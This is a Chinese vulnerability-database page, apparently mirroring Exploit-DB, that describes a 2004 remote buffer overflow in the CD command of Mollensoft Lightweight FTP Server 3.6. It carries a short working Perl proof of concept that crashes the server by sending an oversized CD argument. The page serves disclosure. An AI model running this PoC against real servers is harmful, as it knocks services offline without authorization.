Mollensoft Lightweight FTP Server 3.6 – Remote Buffer Overflow

Mollensoft Lightweight FTP Server 3.6 – Remote Buffer Overflow

漏洞ID 1054478 漏洞类型
发布时间 2004-05-28 更新时间 2004-05-28
图片[1]-Mollensoft Lightweight FTP Server 3.6 – Remote Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-Mollensoft Lightweight FTP Server 3.6 – Remote Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24150
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10429/info

Lightweight FTP Server is prone to a remote buffer overflow vulnerability. This vulnerability can potentially allow a remote attacker to execute arbitrary code in the context of the server process. This issue presents itself due to a lack of sufficient boundary checks performed on CD command arguments.

Lightweight FTP Server version 3.6 is prone to this issue.

This issue is likely related to the issue previously described in BID 10409 (MollenSoft Lightweight FTP Server Remote Denial Of Service Vulnerability). This BID will be updated or retired subsequent to further analysis.

# C:Active Perlperl
# POC for mollensoft ftp server 3.6
# Will crash the deamon

use IO::Socket::INET;

$host = "localhost";
$port = 21;
$buffer = "A" x 238;

$socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);

print $socket "USER rootrn";
$socket->recv($test,100);
print $test;

print $socket "PASS passwordrn";
$socket->recv($test,100);
print $test;

print $socket "CD $bufferrn";
$socket->recv($test,100);
print $test;

close($socket);

相关推荐: Geeklog Forgot Password SQL Injection Vulnerability

Geeklog Forgot Password SQL Injection Vulnerability 漏洞ID 1099411 漏洞类型 Input Validation Error 发布时间 2003-10-19 更新时间 2003-10-19 CVE编号…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享